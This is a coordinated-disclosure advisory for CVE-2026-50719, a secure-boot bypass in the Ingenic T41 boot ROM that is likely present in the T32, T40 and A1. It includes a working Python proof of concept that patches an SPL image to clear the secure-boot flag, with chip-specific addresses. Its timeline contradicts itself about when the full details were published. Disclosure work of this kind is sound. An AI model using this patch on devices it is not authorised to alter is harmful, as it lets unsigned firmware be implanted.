OPENSENSOR ENGINEERING
Security Disclosures
CVE-2026-50719CWE-287 / CWE-250 · Improper AuthenticationPhysical Attack Vector

Ingenic T41 Boot ROM — Pre-Verification Init-Table Bypass

Init table executed before secure boot check provides arbitrary memory write — bypasses signature verification entirely

Discovered: March 2026 · Vendor notified: March 17, 2026 · CVE assigned: June 2026

Vendor
Ingenic Semiconductor
Affected Products
T32, T40, T41, A1
Attack Vector
Physical (boot media write)
Patchable?
No — mask ROM

Vulnerability Description

The Ingenic T41 SoC boot ROM parses and executes an SPL (Secondary Program Loader) header init table beforeevaluating the secure boot state and before invoking signature verification. The init table parser supports full-address 32-bit write operations. This ordering allows an attacker with physical write access to the device's boot media to write a crafted SPL image with an init-table entry that clears the SRAM-resident secure boot state flag, causing the ROM to skip verification entirely.

This vulnerability affects all known boot ROM revisions for T41 and probably also T32, T40, and A1. It was validated by hardware demonstration on a secure-boot-enabled T41 consumer camera device. The vulnerability is present in mask ROM and cannot be remediated by firmware update.

Full technical details will be published following coordinated disclosure.

Impact

  • Complete bypass of secure boot on T41 (and likely T32, T40, A1)
  • Execution of arbitrary unsigned SPL and second-stage bootloader code
  • Full firmware replacement without OEM signing key
  • Vulnerability is in mask ROM and cannot be remediated by firmware update
  • Physical access to boot media (SPI NOR flash) required

Proof of Concept

The following demonstrates the init-table injection used to bypass secure boot. An INGE init-table entry is written to the SPL header at offset 0x100, targeting the SRAM security flag address. The bootrom processes this before signature verification.

#!/usr/bin/env python3
"""T41 init-table bypass — proof of concept."""
import struct
from pathlib import Path

MAGIC = 0x45474E49  # "INGE" little-endian
INIT_OFFSET = 0x100
ENTRY0_OFFSET = 0x120
TERM_OFFSET = 0x134

def inject_patch(data: bytearray, target_addr: int,
                 write_value: int = 0) -> None:
    """Inject init-table that clears secure boot flag."""
    # Header: INGE magic + padding
    struct.pack_into("<I", data, INIT_OFFSET, MAGIC)
    struct.pack_into("<I", data, INIT_OFFSET + 4, 0)
    # Entry 0: write value to target address
    struct.pack_into("<IIIII", data, ENTRY0_OFFSET,
                     target_addr,   # write address
                     0xFFFFFFFF,    # poll address (skip)
                     write_value,  # write value
                     0,             # poll mask (skip)
                     0)             # poll clear (skip)
    # Terminator
    struct.pack_into("<IIIII", data, TERM_OFFSET,
                     0xFFFFFFFF, 0xFFFFFFFF, 0, 0, 0)

# Usage for T41:
#   data = bytearray(Path("firmware.bin").read_bytes())
#   inject_patch(data, 0x80000090, 0x00000000)
#   Path("patched.bin").write_bytes(data)

# T32 variant: target 0x80000024 instead of 0x80000090

The init-table is parsed by the bootrom before secure boot state is checked, allowing the security flag to be cleared before signature verification runs.

Disclosure Timeline

  1. March 17, 2026Ingenic Semiconductor notified via multiple channels
  2. March 17, 2026Downstream vendor notified; active coordination ongoing
  3. March 2026Vulnerability confirmed by hardware demonstration on T41NQ device
  4. March 25, 2026CVE submitted to MITRE — 7 days after vendor notification; early submission due to unpatchable mask ROM vulnerability
  5. June 2026CVE-2026-50719 assigned by MITRE
  6. May 30, 2026Full technical details published — Maine BSides

Credit

Matt Davis (OpenSensor Engineering LLC) and Alfonso Gamboa — equal co-discovery.